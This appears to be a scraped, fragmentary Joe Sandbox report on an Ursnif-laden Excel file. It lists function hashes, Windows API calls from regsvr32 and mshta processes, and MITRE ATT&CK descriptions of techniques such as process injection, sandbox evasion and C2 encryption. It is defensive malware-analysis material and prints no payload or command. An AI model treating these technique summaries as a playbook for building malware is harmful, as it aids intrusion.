Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 92ce27c4326767e5a937f85ada7b6f0fe8510cd58046daabc2c1d24999e745ae
Instruction ID: a38b3d3160041346e38643edea6cacbe59a9a73141a1396e61d4bc5f293cf223
Opcode Fuzzy Hash: 92ce27c4326767e5a937f85ada7b6f0fe8510cd58046daabc2c1d24999e745ae
Instruction Fuzzy Hash: E5F0FF76900118BBCF11EFA9CC85CDE7BACEF093947154166F904D7211E779EA149FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB21C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(057387FA,00000000,00000000,00000000,00FB7100,00000000), ref: 00FB21D1
lstrlen.KERNEL32(?), ref: 00FB21D9

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

lstrcpy.KERNEL32(00000000,057387FA), ref: 00FB21ED
lstrcat.KERNEL32(00000000,?), ref: 00FB21F8

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 22e0cfdbc4fdc6f2a843bb575becef89795328232ac258c9506dbfd305133caf
Instruction ID: 10bbc54f6da59181064dd2d6e6884a07729af6feee8f8c12309a3e973411f372
Opcode Fuzzy Hash: 22e0cfdbc4fdc6f2a843bb575becef89795328232ac258c9506dbfd305133caf
Instruction Fuzzy Hash: 18E01273905229678711ABE99C88C9FBBBDEF897513080516FB00D3110C765D905EFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 3128 Parent PID: 3388 mshta.exeCOMMON

Executed Functions

Function 00000230188B0FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000003.546190488.00000230188B0000.00000010.00000001.sdmp, Offset: 00000230188B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_3_230188b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: c49bd8f59a7c144ac415ab9c3dd82e148561f2f4ab0077de48734480d0b13095
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 3990020459540E56D42411910C9925C604067C8250FD44590445A90284D48D43971166

Uniqueness

Uniqueness Score: -1.00%

Function 00000230188B0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000003.546190488.00000230188B0000.00000010.00000001.sdmp, Offset: 00000230188B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_3_230188b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: c49bd8f59a7c144ac415ab9c3dd82e148561f2f4ab0077de48734480d0b13095
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 3990020459540E56D42411910C9925C604067C8250FD44590445A90284D48D43971166

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mshta.exe PID: 5780 Parent PID: 3388 mshta.exeCOMMON

Executed Functions

Function 0000025F2A690FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000003.548094308.0000025F2A690000.00000010.00000001.sdmp, Offset: 0000025F2A690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_25f2a690000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 35f8ab7c0f9edd99290be38cdf82b8b7af0411f46c4fccf190efdad4e13f50d1
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 389004454D5D0755F45451D10D4D35C744073CC551FD5C4D1CC57D0144D7DD03D75157

Uniqueness

Uniqueness Score: -1.00%

Function 0000025F2A690FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000003.548094308.0000025F2A690000.00000010.00000001.sdmp, Offset: 0000025F2A690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_25f2a690000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 35f8ab7c0f9edd99290be38cdf82b8b7af0411f46c4fccf190efdad4e13f50d1
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 389004454D5D0755F45451D10D4D35C744073CC551FD5C4D1CC57D0144D7DD03D75157

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report documentation_39236.xlsb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 001E39C5, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre